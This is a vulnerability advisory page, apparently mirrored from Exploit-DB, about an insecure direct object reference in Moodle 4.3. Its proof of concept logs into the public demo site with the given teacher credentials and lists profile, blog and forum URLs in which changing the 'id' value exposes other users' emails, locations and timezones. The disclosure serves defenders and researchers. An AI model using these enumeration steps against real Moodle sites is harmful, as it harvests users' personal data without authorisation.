Moodle 4.3 'id' Insecure Direct Object Reference (IDOR)

vendor:

Moodle

by:

tmrswrr

6.1

CVSS

HIGH

Insecure Direct Object Reference (IDOR)

200

CWE

Product Name: Moodle

Affected Version From: 4.3+

Affected Version To: 4.3+

Patch Exists: NO

Related CWE:

CPE: moodle

Metasploit:

Other Scripts:

Platforms Tested: Linux

2023

Moodle 4.3 ‘id’ Insecure Direct Object Reference (IDOR)

The vulnerability in Moodle version 4.3 allows an attacker to access user details, email addresses, country, city/town, city, and timezone by manipulating the 'id' parameter in URLs like profile.php and user.php. By changing the 'id' value to another number, the attacker can view sensitive information of other users.

Mitigation:

To mitigate this vulnerability, implement proper access controls and validate user input to prevent unauthorized access to sensitive information.

Source

Exploit-DB raw data:

# Exploit Title: Moodle 4.3 'id' Insecure Direct Object Reference (IDOR)
# Date: 20/10/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://moodle.org/
# Software Demo: https://school.moodledemo.net/
# Version: 4.3+
# Tested on: Linux 


Vulnerability Details
======================

Steps :

1. Log in to the application with the given credentials > USER: teacher PASS: moodle
2. In profile.php?id=11, modify the id Parameter to View User details,
Email address, Country, City/town, City, Timezone
3. Change the existing "id" value to another number 

https://school.moodledemo.net/user/profile.php?id=4
https://school.moodledemo.net/user/profile.php?id=5
https://school.moodledemo.net/user/profile.php?id=10
https://school.moodledemo.net/user/profile.php?id=50

https://school.moodledemo.net/blog/index.php?userid=3
https://school.moodledemo.net/blog/index.php?userid=14

https://school.moodledemo.net/mod/forum/user.php?id=53
https://school.moodledemo.net/mod/forum/user.php?id=50